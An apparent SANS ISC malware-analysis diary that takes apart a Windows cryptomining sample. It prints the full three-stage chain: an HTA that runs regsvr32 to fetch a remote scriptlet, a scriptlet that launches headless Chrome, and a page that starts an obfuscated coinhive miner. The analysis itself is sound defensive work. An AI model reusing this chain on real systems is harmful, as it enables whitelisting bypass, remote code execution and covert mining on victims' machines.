Crypto Mining in a Windows Headless Browser
Crypto miners in the browser are not new. Delivery through malicious or compromised piece of javascript code is common these days (see my previous diary about this topic[1]). This time, it’s another way to deliver the crypto miner that we found in a sample reported by one of our readers.
What if the victim does not run a browser? What happens if the victim closes it? No problem, just fire one in headless mode to remain stealthy! Indeed, all modern browsers can be run in headless mode (read: without graphical interface). Why is such mode interesting? When you fetch a page with wget or curl, the content gets rendered on the server side but all client-side activity (like JavaScript) is not. Headless browsers provide automated control of a web page in an environment similar to popular web browsers but are controlled via the command line. They can be integrated into scripts via Selenium[2] to automate many tasks related to websites (like automatic crawling).
Let’s have a look at the following malicious HTA code (SHA256: a573758242126c7b01582dc9afbc127580485e0c68bc578002ad361229595099)
$ cat -n stage1.hta 1 <html> 2 <head><HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" /> 3 <script language="VBScript"> 4 Dim objShell, strProgram 5 Set objShell = CreateObject("WScript.Shell") 6 strProgram = "regsvr32.exe /s /u /i:hxxp://slprmnr[.]tk/koadic.png scrobj.dll" 7 objShell.Run strProgram,0,True 8 self.close() 9 </script> 10 </head> 11 <body> 12 </body> 13 </html>
The VBScript will spawn the command in line 6. The parameter “/i” invokes DllInstall[3] for scrobj.dll. The use of regsvr32.exe is a nice technique to bypass application whitelisting. This tool, like most of the Microsoft tools, is signed, can fetch files from the wild Internet and, if needed, uses the local proxy configuration. Scrobj.dll is helpful to register and unregister COM objects. It just needs an SCT file to process. SCT files are basically XML files and can contain very interesting commands.
Let’s grab the second stage delivered via the URL in line 6:
$ cat -n stage2.sct 1 <?XML version="1.0"?> <scriptlet> <registration 2 progid="TESTING" 3 classid="{A1112221-0000-0000-3000-000DA00DABFC}" > 4 <script language="JScript"> 5 <![CDATA[ 6 var foo = new ActiveXObject("WScript.Shell").Run("chrome.exe --headless --disable-gpu --remote-debugging-port=9222 hxxp://slprmnr[.]tk/obfus.html"); 7 ]]> </script> </registration> 8 </scriptlet>
Line 6 is the most interesting. Chrome is started in headless mode and fetches the provided URL. which is the next stage:
$ cat -n stage3.html 1 <html> 2 <body> 3 <script src="hxxps://coinhive[.]com/lib/coinhive.min.js"></script> 4 <script> 5 eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('2 0=1 3.4(\'5\');0.6(); ',7,7,'miner|new|var|CoinHive|Anonymous|CVuJrOnM1MFx7idtIOhKAyM9tyr4sksU|start'.split('|'),0,{})) 6 </script> 7 </body> 8 </html>
This is a classic coinhive miner (SHA256:5d514880ad502302dd4bf0ef8da5d38356385d1c43689f6739f6771ed7a4ef73)[4].
This technique was already covered a few months ago but in a Linux system[5]. In this case, the method used on Windows systems is interesting.
[1] https://isc.sans.edu/forums/diary/Cryptominer+Delivered+Though+Compromized+JavaScript+File/23870/
[2] https://www.seleniumhq.org/
[3] https://docs.microsoft.com/en-us/windows/desktop/api/shlwapi/nf-shlwapi-dllinstall
[4] https://www.virustotal.com/#/file/5d514880ad502302dd4bf0ef8da5d38356385d1c43689f6739f6771ed7a4ef73/detection
[5] https://steemit.com/mining/@ttox/headless-browser-mining
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
Comments